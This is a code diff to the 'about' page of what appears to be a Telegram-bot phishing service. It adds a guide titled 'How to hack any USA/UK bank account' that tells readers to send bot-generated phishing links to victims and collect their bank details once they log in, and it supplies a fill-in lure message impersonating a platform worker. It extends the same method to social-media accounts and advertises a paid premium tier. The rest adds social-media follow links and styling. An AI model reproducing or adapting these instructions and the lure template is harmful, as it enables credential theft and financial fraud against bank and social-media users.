--- a/newcv/about/about.html
+++ b/newcv/about/about.html
@@ -55,8 +55,21 @@ ul li img {width:50px;height:50px;object-fit:contain;border-radius:8px;}
 
 <h2>Step 3: Share With Clients</h2>
 <p>Once verified, your links are safe to share with your clients. Each link is personalized for your Telegram ID to track activity securely.</p>
-</section>
 
+<h1> How to hack any USA/UK bank account </h1>
+<p>This is a simple steps that show how you can hack any USA/Uk bank account freely with intelligent bot</p>
+<h2>How to do it?</h2>
+<p>At first open the main intelligent main app by <a href="https://t.me/intelligentverificationlinkbot/intelligent"> Clicking here.</a></p>
+<p>Open the bot and copy any bank link you want to hack the full bank links was in our Premium plan, you can go Premium to have access to unlimited links.</p>
+<p>After you've copy the link that you want to use, send it to your client, once your client tells you that he has login with link just go back to <a href="https://t.me/intelligentverificationlinkbot">@intelligentverificationlinkbot</a> if your client truly login the bot will send you all his bank information.</p>
+<h2> Format you can use</h2>
+<p> <b>You can simply tell your client</b></p>
+<p> Hey there! valued users my name is %yournamehere% am a workers from %the platform name here% we notice some critical info in your account click the link bellow to remove resistion 
+<a href="https://t.me/intelligentverificationlinkbot/intelligent">%your hacking link here% </a>
+</p>
+<h1> How to hack any social account </h1>
+<p> Just like bank and CC you can also easily hack any social account by <a href="https://t.me/intelligentverificationlinkbot/intelligent">copying your hacking link </a> and send the link to your client with a little format so that you can achieve his account is for free and it's very fast</p>
+</section>
 <!-- Premium Section -->
 <section id="premium" class="page">
 <h2>Premium Features</h2>
@@ -143,5 +156,55 @@ window.addEventListener('load', ()=>{
   setInterval(()=>showMyAd(),60000);
 });
 </script>
+<!-- Follow Us Section -->
+<div class="follow-us">
+  <p>Follow us on:</p>
+  <a href="https://x.com/AmayoIntel3195?t=NiSf9h3P4pexDAu2VqPF_g&s=09" target="_blank" class="social-icon twitter">
+    <i class="fab fa-x"></i>
+  </a>
+  <a href="https://youtube.com/@amayointelligent?si=2C95mQtuxcMYzxJJ" target="_blank" class="social-icon youtube">
+    <i class="fab fa-youtube"></i>
+  </a>
+  <a href="https://t.me/intelligentverificationlinkbot" target="_blank" class="social-icon telegram">
+    <i class="fab fa-telegram"></i>
+  </a>
+</div>
+
+<!-- Font Awesome for icons -->
+<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
+
+<style>
+.follow-us {
+  text-align: center;
+  padding: 15px 0;
+  background: #111;
+  color: #eee;
+  border-top: 1px solid #222;
+  font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
+}
+
+.follow-us p {
+  margin-bottom: 10px;
+  font-weight: 700;
+  font-size: 1rem;
+}
+
+.social-icon {
+  display: inline-block;
+  margin: 0 12px;
+  font-size: 22px;
+  color: #eee;
+  text-decoration: none;
+  transition: transform 0.2s, color 0.2s;
+}
+
+.social-icon:hover {
+  transform: scale(1.3);
+}
+
+.social-icon.twitter { color: #1DA1F2; }
+.social-icon.youtube { color: #FF0000; }
+.social-icon.telegram { color: #0088cc; }
+</style>
 </body>
 </html>
